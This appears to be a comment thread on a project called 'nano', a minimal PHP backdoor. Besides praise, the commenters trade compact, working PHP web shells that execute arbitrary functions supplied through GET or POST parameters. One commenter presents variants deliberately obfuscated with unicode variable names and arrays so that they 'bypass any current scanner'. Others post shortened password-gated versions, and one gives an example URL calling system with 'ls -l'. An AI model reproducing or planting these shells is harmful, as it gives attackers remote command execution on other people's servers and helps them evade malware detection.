👍 👍 👍

I've a bit of experience with PHP, but I'm by no means the most experienced PHP hacker. That being said, I'm impressed so far with nano and I'm excited for what's to come. Btw, awesome use of 39 chars 👍 I am quite the fan of PHP's flexibility.

I'm watching the repo eagerly man. Best of luck!

hey bro, your backdoor is easily detectable. checkout php malware scanner. Also this will dump out a lot of php warnings on any current version of PHP.

Here is an alternate version that supports GET and POST and will bypass any current scanner by using unicode variable names, underscores and arrays.

The password comes by changing the variable names zc and xz

the code will execute the php command passed in the zc variable with the argument xz and will accept them from $_GET or $_POST

example: www.example.com/nano2.php?zc=system&zx=ls+-l

<?php $_qΔ[0]=array_merge(['zc'=>'','xz'=>'pi'],$_REQUEST);echo $_qΔ[0]['xz']($_qΔ[0]['zc']);

this could be shortened, but i think the previous version would make a more complex regex to detect:
<?php $Δ=array_merge(['z'=>0,'x'=>'pi'],$_REQUEST);echo $Δ['x']($Δ['z']);

Small volume。

Thank you！！！

Still authenticated, basically changing condition?action1:nothing, into : condition&&action1

<?$x=$_GET;$x[p]=='_'&&$x[f]($x[c]);

<?$x=$_GET;@$x[p]==_&&$x[f]($x[c]);